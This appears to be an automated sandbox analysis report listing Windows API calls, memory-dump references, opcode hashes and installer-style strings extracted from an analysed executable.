                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MetricsSystem$A570A6310DeleteObject
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3435189566-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set permissions on registry key (%d)., xrefs: 004738FC
• Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
• Setting permissions on registry key: %s\%s, xrefs: 0047389A
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
• Opcode ID: 4d98b71999ae2082828fc29cf634de87cfef39e11f459e5f22db8e3bfe246984
• Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
• Opcode Fuzzy Hash: 4d98b71999ae2082828fc29cf634de87cfef39e11f459e5f22db8e3bfe246984
• Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
• Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
• Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
• Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
Uniqueness
Uniqueness Score: -1.00%

APIs
• 73E98830.GDI32(00000000,00000000,00000000), ref: 00414429
• 73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
• 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
• 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
• 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: E922E98830$A480
• String ID:
• API String ID: 3692852386-0
• Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
• Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
• Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
• Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                                                                                                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1177325624-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c2b32b2b07f49d41d3dbdf125302b54fc4faf3ebe171660f17d813ef15d361c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c2b32b2b07f49d41d3dbdf125302b54fc4faf3ebe171660f17d813ef15d361c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,L2h,?,?,?,004018B4), ref: 00401566
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,L2h,?,?,?,004018B4), ref: 0040158B
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,L2h,?,?,?,004018B4), ref: 004015B1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                                                                                                                  • String ID: L2h$|2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3668210933-580210207
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Need to restart Windows? %s, xrefs: 0046C172
                                                                                                                                                                                                                                                                                                                                                                  • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                                                                                                                                                                                                                                                                                                                                  • NextButtonClick, xrefs: 0046BF84
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2329492092
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ebbf1f9ef76be85ef82e878402c1311cdfd52bf366864cdbcb8254cf7c08a6b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebbf1f9ef76be85ef82e878402c1311cdfd52bf366864cdbcb8254cf7c08a6b9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ActiveChangeNotifyWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $Need to restart Windows? %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1160245247-4200181552
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Creating directory: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2451617938-483064649
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 892f1ca02512540dfd12b783a17ec89958af887d03fc0ba297f933839a84b762
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 892f1ca02512540dfd12b783a17ec89958af887d03fc0ba297f933839a84b762
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                                                                                                                                                                                                                                                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                                                                                                                                                                                                                                                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Z
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3604996873-1505515367
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DrawText$EmptyRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 182455014-2867612384
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0042EFD1
